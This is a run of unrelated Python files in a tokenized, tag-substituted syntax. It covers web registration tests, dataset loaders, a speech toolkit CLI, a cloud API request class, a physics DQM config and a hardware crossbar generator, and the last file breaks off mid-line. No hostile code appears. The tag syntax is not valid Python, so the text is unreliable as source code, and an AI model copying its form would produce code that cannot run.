<import_from_stmt>typing Any AsyncGenerator Dict cast<import_stmt>httpx<import_stmt>pytest<import_from_stmt>fastapi FastAPI status<import_from_stmt>fastapi_users.router ErrorCode get_register_router<import_from_stmt>tests.conftest User UserCreate<line_sep>@pytest.fixture@pytest.mark.asyncio<async_keyword><def_stmt>test_app_client get_user_manager get_test_client<arrow>AsyncGenerator[httpx.AsyncClient <none>]<block_start>register_router=get_register_router(get_user_manager User UserCreate )<line_sep>app=FastAPI()<line_sep>app.include_router(register_router)<async_keyword><for_stmt>client get_test_client(app)<block_start><yield>client<block_end><block_end>@pytest.mark.router@pytest.mark.asyncio<class_stmt>TestRegister<block_start><async_keyword><def_stmt>test_empty_body self test_app_client:httpx.AsyncClient<block_start>response=<await>test_app_client.post("/register" json={})<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_missing_email self test_app_client:httpx.AsyncClient<block_start>json={"password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_missing_password self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_wrong_email self test_app_client:httpx.AsyncClient<block_start>json={"email":"king.arthur" "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_422_UNPROCESSABLE_ENTITY<block_end><async_keyword><def_stmt>test_invalid_password self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" 
"password":"g"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_400_BAD_REQUEST<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["detail"]<eq>{"code":ErrorCode.REGISTER_INVALID_PASSWORD "reason":"Password should be at least 3 characters" }<block_end>@pytest.mark.parametrize("email" ["<EMAIL>" "<EMAIL>"])<async_keyword><def_stmt>test_existing_user self email test_app_client:httpx.AsyncClient<block_start>json={"email":email "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_400_BAD_REQUEST<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["detail"]<eq>ErrorCode.REGISTER_USER_ALREADY_EXISTS<block_end>@pytest.mark.parametrize("email" ["<EMAIL>" "<EMAIL>"])<async_keyword><def_stmt>test_valid_body self email test_app_client:httpx.AsyncClient<block_start>json={"email":email "password":"<PASSWORD>"}<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>"hashed_password"<not><in>data<assert_stmt>"password"<not><in>data<assert_stmt>data["id"]<is><not><none><block_end><async_keyword><def_stmt>test_valid_body_is_superuser self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" "password":"<PASSWORD>" "is_superuser":<true> }<line_sep>response=<await>test_app_client.post("/register" json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["is_superuser"]<is><false><block_end><async_keyword><def_stmt>test_valid_body_is_active self test_app_client:httpx.AsyncClient<block_start>json={"email":"<EMAIL>" "password":"<PASSWORD>" "is_active":<false> }<line_sep>response=<await>test_app_client.post("/register" 
json=json)<assert_stmt>response.status_code<eq>status.HTTP_201_CREATED<line_sep>data=cast(Dict[str Any] response.json())<assert_stmt>data["is_active"]<is><true><block_end><block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_register_namespace get_user_manager<block_start>app=FastAPI()<line_sep>app.include_router(get_register_router(get_user_manager User UserCreate ))<assert_stmt>app.url_path_for("register:register")<eq>"/register"<block_end>
<import_stmt>logging<import_stmt>os<import_stmt>numpy<as>np<import_stmt>xml.etree.ElementTree<as>ET<import_from_stmt>PIL Image<import_from_stmt>paths DATASETS_ROOT<line_sep>log=logging.getLogger()<line_sep>VOC_CATS=['__background__' 'aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor']<class_stmt>VOCLoader()<block_start><def_stmt>__init__ self year split segmentation=<false> augmented_seg=<false><block_start><assert_stmt>year<in>['07' '12']<line_sep>self.dataset='voc'<line_sep>self.year=year<line_sep>self.root=os.path.join(DATASETS_ROOT 'VOCdevkit/VOC20%s/'%year)<line_sep>self.split=split<assert_stmt>split<in>['train' 'val' 'trainval' 'test']<line_sep>cats=VOC_CATS<line_sep>self.cats_to_ids=dict(map(reversed enumerate(cats)))<line_sep>self.ids_to_cats=dict(enumerate(cats))<line_sep>self.num_classes=len(cats)<line_sep>self.categories=cats[1:]<line_sep>self.segmentation=segmentation<line_sep>self.augmented_seg=augmented_seg<assert_stmt><not>self.segmentation<or>self.segmentation<and>self.year<eq>'12'<if_stmt>self.augmented_seg<block_start>filelist='ImageSets/SegmentationAug/%s.txt'<block_end><elif_stmt>self.segmentation<block_start>filelist='ImageSets/Segmentation/%s.txt'<block_end><else_stmt><block_start>filelist='ImageSets/Main/%s.txt'<block_end><with_stmt>open(os.path.join(self.root filelist%self.split) 'r')<as>f<block_start>self.filenames=f.read().split('\n')[:-1]<block_end>log.info("Created a loader VOC%s %s with %i images"%(year split len(self.filenames)))<block_end><def_stmt>load_image self name<block_start>im=Image.open('%sJPEGImages/%s.jpg'%(self.root name)).convert('RGB')<line_sep>im=np.array(im)/255.0<line_sep>im=im.astype(np.float32)<line_sep><return>im<block_end><def_stmt>get_filenames self<block_start><return>self.filenames<block_end><def_stmt>read_annotations self 
name<block_start>bboxes=[]<line_sep>cats=[]<line_sep>tree=ET.parse('%sAnnotations/%s.xml'%(self.root name))<line_sep>root=tree.getroot()<line_sep>width=int(root.find('size/width').text)<line_sep>height=int(root.find('size/height').text)<line_sep>difficulty=[]<for_stmt>obj root.findall('object')<block_start>cat=self.cats_to_ids[obj.find('name').text]<line_sep>difficult=(int(obj.find('difficult').text)<ne>0)<line_sep>difficulty.append(difficult)<line_sep>cats.append(cat)<line_sep>bbox_tag=obj.find('bndbox')<line_sep>x=int(bbox_tag.find('xmin').text)<line_sep>y=int(bbox_tag.find('ymin').text)<line_sep>w=int(bbox_tag.find('xmax').text)-x<line_sep>h=int(bbox_tag.find('ymax').text)-y<line_sep>bboxes.append((x y w h))<block_end>gt_cats=np.array(cats)<line_sep>gt_bboxes=np.array(bboxes).reshape((len(bboxes) 4))<line_sep>difficulty=np.array(difficulty)<line_sep>seg_gt=self.read_segmentations(name height width)<line_sep>output=gt_bboxes seg_gt gt_cats width height difficulty<line_sep><return>output<block_end><def_stmt>read_segmentations self name height width<block_start><if_stmt>self.segmentation<block_start><try_stmt><block_start>seg_folder=self.root+'SegmentationClass/'<line_sep>seg_file=seg_folder+name+'.png'<line_sep>seg_map=Image.open(seg_file)<block_end><except_stmt><block_start><assert_stmt>self.augmented_seg<line_sep>seg_folder=self.root+'SegmentationClassAug/'<line_sep>seg_file=seg_folder+name+'.png'<line_sep>seg_map=Image.open(seg_file)<block_end>segmentation=np.array(seg_map dtype=np.uint8)<block_end><else_stmt># if there is no segmentation for a particular image we fill the mask # with zeros to keep the same amount of tensors but don't learn from it <block_start>segmentation=np.zeros([height width] dtype=np.uint8)+255<block_end><return>segmentation<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>skmultiflow.drift_detection ADWIN<def_stmt>demo <block_start>""" _test_adwin In this demo, an ADWIN object evaluates a sequence of numbers corresponding to 2 distributions. The ADWIN object indicates the indices where change is detected. The first half of the data is a sequence of randomly generated 0's and 1's. The second half of the data is a normal distribution of integers from 0 to 7. """<line_sep>adwin=ADWIN()<line_sep>size=2000<line_sep>change_start=999<line_sep>np.random.seed(1)<line_sep>data_stream=np.random.randint(2 size=size)<line_sep>data_stream[change_start:]=np.random.randint(8 size=size-change_start)<for_stmt>i range(size)<block_start>adwin.add_element(data_stream[i])<if_stmt>adwin.detected_change()<block_start>print('Change has been detected in data: '+str(data_stream[i])+' - of index: '+str(i))<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>demo()<block_end>
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>argparse<import_from_stmt>typing List<import_from_stmt>prettytable PrettyTable<import_from_stmt>..utils cli_register<import_from_stmt>..utils stats_wrapper<line_sep>__all__=['StatsExecutor']<line_sep>model_name_format={'asr':'Model-Language-Sample Rate' 'cls':'Model-Sample Rate' 'st':'Model-Source language-Target language' 'text':'Model-Task-Language' 'tts':'Model-Language' 'vector':'Model-Sample Rate'}<line_sep>@cli_register(name='paddlespeech.stats' description='Get speech tasks support models list.')<class_stmt>StatsExecutor()<block_start><def_stmt>__init__ self<block_start>super().__init__()<line_sep>self.parser=argparse.ArgumentParser(prog='paddlespeech.stats' add_help=<true>)<line_sep>self.task_choices=['asr' 'cls' 'st' 'text' 'tts' 'vector']<line_sep>self.parser.add_argument('--task' type=str default='asr' choices=self.task_choices help='Choose speech task.' required=<true>)<block_end><def_stmt>show_support_models self pretrained_models:dict<block_start>fields=model_name_format[self.task].split("-")<line_sep>table=PrettyTable(fields)<for_stmt>key pretrained_models<block_start>table.add_row(key.split("-"))<block_end>print(table)<block_end><def_stmt>execute self argv:List[str]<arrow>bool<block_start>""" Command line entry. 
"""<line_sep>parser_args=self.parser.parse_args(argv)<line_sep>has_exceptions=<false><try_stmt><block_start>self(parser_args.task)<block_end><except_stmt>Exception<as>e<block_start>has_exceptions=<true><block_end><if_stmt>has_exceptions<block_start><return><false><block_end><else_stmt><block_start><return><true><block_end><block_end>@stats_wrapper<def_stmt>__call__ self task:str=<none> <block_start>""" Python API to call an executor. """<line_sep>self.task=task<if_stmt>self.task<not><in>self.task_choices<block_start>print("Please input correct speech task, choices = "+str(self.task_choices))<block_end><elif_stmt>self.task<eq>'asr'<block_start><try_stmt><block_start><import_from_stmt>..asr.pretrained_models pretrained_models<line_sep>print("Here is the list of ASR pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of ASR pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'cls'<block_start><try_stmt><block_start><import_from_stmt>..cls.pretrained_models pretrained_models<line_sep>print("Here is the list of CLS pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of CLS pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'st'<block_start><try_stmt><block_start><import_from_stmt>..st.pretrained_models pretrained_models<line_sep>print("Here is the list of ST pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of ST pretrained 
models.")<block_end><block_end><elif_stmt>self.task<eq>'text'<block_start><try_stmt><block_start><import_from_stmt>..text.pretrained_models pretrained_models<line_sep>print("Here is the list of TEXT pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of TEXT pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'tts'<block_start><try_stmt><block_start><import_from_stmt>..tts.pretrained_models pretrained_models<line_sep>print("Here is the list of TTS pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of TTS pretrained models.")<block_end><block_end><elif_stmt>self.task<eq>'vector'<block_start><try_stmt><block_start><import_from_stmt>..vector.pretrained_models pretrained_models<line_sep>print("Here is the list of Speaker Recognition pretrained models released by PaddleSpeech that can be used by command line and python API")<line_sep>self.show_support_models(pretrained_models)<block_end><except_stmt>BaseException<block_start>print("Failed to get the list of Speaker Recognition pretrained models.")<block_end><block_end><block_end><block_end>
# # Copyright 2019 Xilinx Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Registry mechanism for "registering" classes/functions for general use. This is typically used with a decorator that calls Register for adding a class or function to a registry. """<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<class_stmt>Registry(object)<block_start>"""Provides a registry for saving objects."""<def_stmt>__init__ self name<block_start>"""Creates a new registry."""<line_sep>self._name=name<line_sep>self._registry={}<block_end><def_stmt>register self obj name=<none><block_start>"""Registers a Python object "obj" for the given "name". Args: obj: The object to add to the registry. name: An optional string specifying the registry key for the obj. If None, obj.__name__ will be used. Raises: KeyError: If same name is registered twice. """<if_stmt><not>name<block_start>name=obj.__name__<block_end><if_stmt>name<in>self._registry<block_start><raise>KeyError("Name '%s' has been registered in '%s'!"%(name self._name))<block_end># logging.vlog(1, "Registering %s (%s) in %s.", name, obj, self._name) self._registry[name]=obj<block_end><def_stmt>list self<block_start>"""Lists registered items. Returns: A list of names of registered objects. """<line_sep><return>self._registry.keys()<block_end><def_stmt>lookup self name<block_start>"""Looks up "name". Args: name: a string specifying the registry key for the obj. 
Returns: Registered object if found Raises: LookupError: if "name" has not been registered. """<if_stmt>name<in>self._registry<block_start><return>self._registry[name]<block_end><else_stmt><block_start><raise>LookupError("%s registry has no entry for: %s"%(self._name name))<block_end><block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_from_stmt>aliyunsdkcore.request RpcRequest<import_from_stmt>aliyunsdkhbase.endpoint endpoint_data<class_stmt>CreateClusterRequest(RpcRequest)<block_start><def_stmt>__init__ self<block_start>RpcRequest.__init__(self 'HBase' '2019-01-01' 'CreateCluster' 'hbase')<line_sep>self.set_method('POST')<if_stmt>hasattr(self "endpoint_map")<block_start>setattr(self "endpoint_map" endpoint_data.getEndpointMap())<block_end><if_stmt>hasattr(self "endpoint_regional")<block_start>setattr(self "endpoint_regional" endpoint_data.getEndpointRegional())<block_end><block_end><def_stmt>get_ClusterName self<block_start><return>self.get_query_params().get('ClusterName')<block_end><def_stmt>set_ClusterName self ClusterName<block_start>self.add_query_param('ClusterName' ClusterName)<block_end><def_stmt>get_ClientToken self<block_start><return>self.get_query_params().get('ClientToken')<block_end><def_stmt>set_ClientToken self ClientToken<block_start>self.add_query_param('ClientToken' ClientToken)<block_end><def_stmt>get_EngineVersion self<block_start><return>self.get_query_params().get('EngineVersion')<block_end><def_stmt>set_EngineVersion self EngineVersion<block_start>self.add_query_param('EngineVersion' 
EngineVersion)<block_end><def_stmt>get_ResourceGroupId self<block_start><return>self.get_query_params().get('ResourceGroupId')<block_end><def_stmt>set_ResourceGroupId self ResourceGroupId<block_start>self.add_query_param('ResourceGroupId' ResourceGroupId)<block_end><def_stmt>get_Engine self<block_start><return>self.get_query_params().get('Engine')<block_end><def_stmt>set_Engine self Engine<block_start>self.add_query_param('Engine' Engine)<block_end><def_stmt>get_AutoRenewPeriod self<block_start><return>self.get_query_params().get('AutoRenewPeriod')<block_end><def_stmt>set_AutoRenewPeriod self AutoRenewPeriod<block_start>self.add_query_param('AutoRenewPeriod' AutoRenewPeriod)<block_end><def_stmt>get_Period self<block_start><return>self.get_query_params().get('Period')<block_end><def_stmt>set_Period self Period<block_start>self.add_query_param('Period' Period)<block_end><def_stmt>get_DiskSize self<block_start><return>self.get_query_params().get('DiskSize')<block_end><def_stmt>set_DiskSize self DiskSize<block_start>self.add_query_param('DiskSize' DiskSize)<block_end><def_stmt>get_EncryptionKey self<block_start><return>self.get_query_params().get('EncryptionKey')<block_end><def_stmt>set_EncryptionKey self EncryptionKey<block_start>self.add_query_param('EncryptionKey' EncryptionKey)<block_end><def_stmt>get_MasterInstanceType self<block_start><return>self.get_query_params().get('MasterInstanceType')<block_end><def_stmt>set_MasterInstanceType self MasterInstanceType<block_start>self.add_query_param('MasterInstanceType' MasterInstanceType)<block_end><def_stmt>get_DiskType self<block_start><return>self.get_query_params().get('DiskType')<block_end><def_stmt>set_DiskType self DiskType<block_start>self.add_query_param('DiskType' DiskType)<block_end><def_stmt>get_VSwitchId self<block_start><return>self.get_query_params().get('VSwitchId')<block_end><def_stmt>set_VSwitchId self VSwitchId<block_start>self.add_query_param('VSwitchId' 
VSwitchId)<block_end><def_stmt>get_SecurityIPList self<block_start><return>self.get_query_params().get('SecurityIPList')<block_end><def_stmt>set_SecurityIPList self SecurityIPList<block_start>self.add_query_param('SecurityIPList' SecurityIPList)<block_end><def_stmt>get_ColdStorageSize self<block_start><return>self.get_query_params().get('ColdStorageSize')<block_end><def_stmt>set_ColdStorageSize self ColdStorageSize<block_start>self.add_query_param('ColdStorageSize' ColdStorageSize)<block_end><def_stmt>get_PeriodUnit self<block_start><return>self.get_query_params().get('PeriodUnit')<block_end><def_stmt>set_PeriodUnit self PeriodUnit<block_start>self.add_query_param('PeriodUnit' PeriodUnit)<block_end><def_stmt>get_CoreInstanceType self<block_start><return>self.get_query_params().get('CoreInstanceType')<block_end><def_stmt>set_CoreInstanceType self CoreInstanceType<block_start>self.add_query_param('CoreInstanceType' CoreInstanceType)<block_end><def_stmt>get_VpcId self<block_start><return>self.get_query_params().get('VpcId')<block_end><def_stmt>set_VpcId self VpcId<block_start>self.add_query_param('VpcId' VpcId)<block_end><def_stmt>get_NodeCount self<block_start><return>self.get_query_params().get('NodeCount')<block_end><def_stmt>set_NodeCount self NodeCount<block_start>self.add_query_param('NodeCount' NodeCount)<block_end><def_stmt>get_ZoneId self<block_start><return>self.get_query_params().get('ZoneId')<block_end><def_stmt>set_ZoneId self ZoneId<block_start>self.add_query_param('ZoneId' ZoneId)<block_end><def_stmt>get_PayType self<block_start><return>self.get_query_params().get('PayType')<block_end><def_stmt>set_PayType self PayType<block_start>self.add_query_param('PayType' PayType)<block_end><block_end>
# Definition for singly-linked list. # class ListNode(object): # def __init__(self, x): # self.val = x # self.next = None <class_stmt>Solution(object)<block_start><def_stmt>middleNode self head<block_start>""" :type head: ListNode :rtype: ListNode """<if_stmt><not>head<block_start><return><none><block_end>fastRuner,slowRuner=head head<while_stmt>fastRuner<and>fastRuner.next<block_start>fastRuner=fastRuner.next.next<line_sep>slowRuner=slowRuner.next<block_end><return>slowRuner<block_end><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>DQMServices.Core.DQMEDHarvester DQMEDHarvester<import_from_stmt>DQM.SiPixelPhase1Common.HistogramManager_cfi *<import_stmt>DQM.SiPixelPhase1Common.TriggerEventFlag_cfi<as>trigger<line_sep>SiPixelPhase1TrackEfficiencyValid=DefaultHistoTrack.clone(name="valid" title="Valid Hits" range_min=0 range_max=50 range_nbins=50 xlabel="valid hits" dimensions=0 specs=VPSet(StandardSpecifications1D_Num #StandardSpecification2DProfile_Num, #for this we have the on track clusters map (i.e the same thing) Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=1500) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=1500) ))<line_sep>SiPixelPhase1TrackEfficiencyInactive=DefaultHistoTrack.clone(name="inactive" title="Inactive Hits" xlabel="inactive hits" range_min=0 range_max=25 range_nbins=25 dimensions=0 specs=VPSet(StandardSpecification2DProfile_Num Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=100) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=100) ))<line_sep>SiPixelPhase1TrackEfficiencyMissing=DefaultHistoTrack.clone(name="missing" title="Missing Hits" range_min=0 range_max=25 range_nbins=25 xlabel="missing hits" dimensions=0 specs=VPSet(StandardSpecifications1D_Num StandardSpecification2DProfile_Num Specification().groupBy("PXBarrel/PXLayer/Event")#this will produce inclusive counts per Layer/Disk .reduce("COUNT").groupBy("PXBarrel/PXLayer").save(nbins=50 xmin=0 xmax=100) Specification().groupBy("PXForward/PXDisk/Event").reduce("COUNT").groupBy("PXForward/PXDisk/").save(nbins=50 xmin=0 xmax=100) 
))<line_sep>SiPixelPhase1TrackEfficiencyEfficiency=SiPixelPhase1TrackEfficiencyValid.clone(name="hitefficiency" title="Hit Efficiency" xlabel="#valid/(#valid+#missing)" dimensions=1 specs=VPSet(StandardSpecification2DProfile #profiles per layer and shell Specification(PerLadder).groupBy("PXBarrel/Shell/PXLayer/SignedLadder").reduce("MEAN").groupBy("PXBarrel/Shell/PXLayer" "EXTEND_X").save() Specification(PerLadder).groupBy("PXForward/HalfCylinder/PXRing/PXDisk/SignedBlade").reduce("MEAN").groupBy("PXForward/HalfCylinder/PXRing/PXDisk" "EXTEND_X").save() #per layer Specification().groupBy("PXBarrel/PXLayer").reduce("MEAN").groupBy("PXBarrel" "EXTEND_X").save() Specification().groupBy("PXForward/PXDisk").reduce("MEAN").groupBy("PXForward" "EXTEND_X").save() Specification(PerLayer2D).groupBy("PXBarrel/PXLayer/Lumisection").groupBy("PXBarrel/PXLayer" "EXTEND_X").groupBy("PXBarrel" "EXTEND_Y").reduce("MEAN").save() Specification(PerLayer2D).groupBy("PXForward/PXDisk/Lumisection").groupBy("PXForward/PXDisk" "EXTEND_X").groupBy("PXForward" "EXTEND_Y").reduce("MEAN").save() ))<line_sep>SiPixelPhase1TrackEfficiencyVertices=DefaultHistoTrack.clone(name="num_vertices" title="PrimaryVertices" xlabel="# Vertices" dimensions=1 range_min=-0.5 range_max=100.5 range_nbins=101 specs=VPSet(Specification().groupBy("").save() Specification().groupBy("/Lumisection").reduce("MEAN").groupBy("" "EXTEND_X").save()))<import_from_stmt>Configuration.Eras.Modifier_run3_common_cff run3_common<line_sep>run3_common.toModify(SiPixelPhase1TrackEfficiencyVertices range_max=150.5 range_nbins=151)<line_sep>SiPixelPhase1TrackEfficiencyConf=cms.VPSet(SiPixelPhase1TrackEfficiencyValid SiPixelPhase1TrackEfficiencyMissing SiPixelPhase1TrackEfficiencyInactive SiPixelPhase1TrackEfficiencyEfficiency SiPixelPhase1TrackEfficiencyVertices)<import_from_stmt>DQMServices.Core.DQMEDAnalyzer DQMEDAnalyzer<line_sep>SiPixelPhase1TrackEfficiencyAnalyzer=DQMEDAnalyzer('SiPixelPhase1TrackEfficiency' 
clusters=cms.InputTag("siPixelClusters") tracks=cms.InputTag("generalTracks") trajectoryInput=cms.InputTag("refittedForPixelDQM") primaryvertices=cms.InputTag("offlinePrimaryVertices") tracker=cms.InputTag("MeasurementTrackerEvent") histograms=SiPixelPhase1TrackEfficiencyConf geometry=SiPixelPhase1Geometry triggerflags=trigger.SiPixelPhase1Triggers VertexCut=cms.untracked.bool(<true>))<line_sep>SiPixelPhase1TrackEfficiencyHarvester=DQMEDHarvester("SiPixelPhase1Harvester" histograms=SiPixelPhase1TrackEfficiencyConf geometry=SiPixelPhase1Geometry)<line_sep>
# Copyright lowRISC contributors. # Licensed under the Apache License, Version 2.0, see LICENSE for details. # SPDX-License-Identifier: Apache-2.0 <import_stmt>logging<as>log<import_from_stmt>.item Node NodeType<import_from_stmt>.xbar Xbar<def_stmt>elaborate xbar:Xbar<arrow>bool<block_start>"""elaborate reads all nodes and edges then construct internal FIFOs, Sockets. """<line_sep># Condition check <if_stmt>len(xbar.nodes)<le>1<or>len(xbar.edges)<eq>0<block_start>log.error("# of Nodes is less than 2 or no Edge exists. Cannot proceed.")<line_sep><return><false><block_end><for_stmt>host xbar.hosts<block_start>process_node(host xbar)<line_sep>log.info("Node Processed: "+repr(xbar))<block_end># Pipeline process_pipeline(xbar)<line_sep># Build address map # Each socket_1n should have address map <return><true><block_end><def_stmt>process_node node xbar# node: Node -> xbar: Xbar -> Xbar <block_start>"""process each node based on algorithm 1. If a node has different clock from main clock and not ASYNC_FIFO: a. (New Node) Create ASYNC_FIFO node. b. Revise every edges from the node to have start node as ASYNC_FIFO node. (New Edge) create a edge from the node to ASYNC_FIFO node. - Repeat the algorithm with ASYNC_FIFO node. c. Revise every edges to the node to have end node as ASYNC_FIFO node. (New Edge) create a edge from ASYNC_FIFO node to the node. d. If it is not DEVICE, HOST node, raise Error. If it is DEVICE, end (next item). 2. If a node has multiple edges having it as a end node and not SOCKET_M1: a. (New node) Create SOCKET_M1 node. b. Revise every edges to the node to have SOCKET_M1 node as end node. c. (New Edge) create a edge from SOCKET_M1 to the node. d. Repeat the algorithm with the node. 3. If a node has multiple edges having it as a start node and not SOCKET_1N: a. (New node) Create SOCKET_1N node. b. Revise every edges from the node to have SOCKET_1N node as start node. c. (New Edge) Create a edge from the node to SOCKET_1N node. d. 
(for loop) Repeat the algorithm with SOCKET_1N's other side node. """<line_sep># If a node has different clock from main clock and not ASYNC_FIFO: <if_stmt>node.node_type<ne>NodeType.ASYNC_FIFO<and>node.clocks[0]<ne>xbar.clock# (New Node) Create ASYNC_FIFO node <block_start>new_node=Node(name="asf_"+str(len(xbar.nodes)) node_type=NodeType.ASYNC_FIFO clock=xbar.clock reset=xbar.reset)<line_sep># if node is HOST, host clock synchronizes into xbar domain # if node is DEVICE, xbar synchronizes into device clock domain <if_stmt>node.node_type<eq>NodeType.HOST<block_start>new_node.clocks.insert(0 node.clocks[0])<line_sep>new_node.resets.insert(0 node.resets[0])<block_end><else_stmt><block_start>new_node.clocks.append(node.clocks[0])<line_sep>new_node.resets.append(node.resets[0])<block_end>xbar.insert_node(new_node node)<line_sep>process_node(new_node xbar)<block_end># If a node has multiple edges having it as a end node and not SOCKET_M1: <elif_stmt>node.node_type<ne>NodeType.SOCKET_M1<and>len(node.us)<g>1# (New node) Create SOCKET_M1 node <block_start>new_node=Node(name="sm1_"+str(len(xbar.nodes)) node_type=NodeType.SOCKET_M1 clock=xbar.clock reset=xbar.reset)<line_sep># By default, assume connecting to SOCKET_1N upstream and bypass all FIFOs # If upstream requires pipelining, it will be added through process pipeline new_node.hdepth=0<line_sep>new_node.hpass=2<power>len(node.us)-1<line_sep>new_node.ddepth=0<line_sep>new_node.dpass=1<line_sep>xbar.insert_node(new_node node)<line_sep>process_node(new_node xbar)<block_end># If a node has multiple edges having it as a start node and not SOCKET_1N: <elif_stmt>node.node_type<ne>NodeType.SOCKET_1N<and>len(node.ds)<g>1# (New node) Create SOCKET_1N node <block_start>new_node=Node(name="s1n_"+str(len(xbar.nodes)) node_type=NodeType.SOCKET_1N clock=xbar.clock reset=xbar.reset)<line_sep># By default, assume connecting to SOCKET_M1 downstream and bypass all FIFOs # If upstream requires pipelining, it will be added through process 
pipeline new_node.hdepth=0<line_sep>new_node.hpass=1<line_sep>new_node.ddepth=0<line_sep>new_node.dpass=2<power>len(node.ds)-1<line_sep>xbar.insert_node(new_node node)<line_sep># (for loop) Repeat the algorithm with SOCKET_1N's other side node <for_stmt>edge new_node.ds<block_start>process_node(edge.ds xbar)<block_end><block_end><return>xbar<block_end><def_stmt>process_pipeline xbar<block_start>"""Check if HOST, DEVICE has settings different from default, then propagate it to end """<for_stmt>host xbar.hosts# go downstream and change the HReqPass/Depth at the first instance. # If it is async, skip. # If Socket 1N, # if pipeline True and bypass false, set hpass to 0 # if pipeline is False, set depth to 0 # If Socket M1, find position of the host and follow procedure above # If it is device, it means host and device are directly connected. Ignore now. <block_start>log.info("Processing pipeline for host {}".format(host.name))<line_sep># FIFO present with no passthrough option # FIFO present with passthrough option # FIFO not present and full passthrough full_fifo=<false><line_sep>fifo_passthru=<false><line_sep>full_passthru=<true><if_stmt>host.pipeline<is><true><and>host.pipeline_byp<is><false><block_start>full_fifo=<true><block_end><elif_stmt>host.pipeline<is><true><and>host.pipeline_byp<is><true><block_start>fifo_passthru=<true><block_end><elif_stmt>host.pipeline<is><false><block_start>full_passthru=<true><block_end>dnode=host.ds[0].ds<if_stmt>dnode.node_type<eq>NodeType.ASYNC_FIFO<block_start><continue><block_end><if_stmt>dnode.node_type<eq>NodeType.SOCKET_1N<block_start><if_stmt>full_fifo<block_start>dnode.hpass=0<line_sep>dnode.hdepth=2<block_end><elif_stmt>fifo_passthru<block_start>dnode.hpass=0<line_sep>dnode.hdepth=2<block_end><elif_stmt>full_passthru<block_start>dnode.hpass=1<line_sep>dnode.hdepth=0<block_end>log.info("Finished processing socket1n 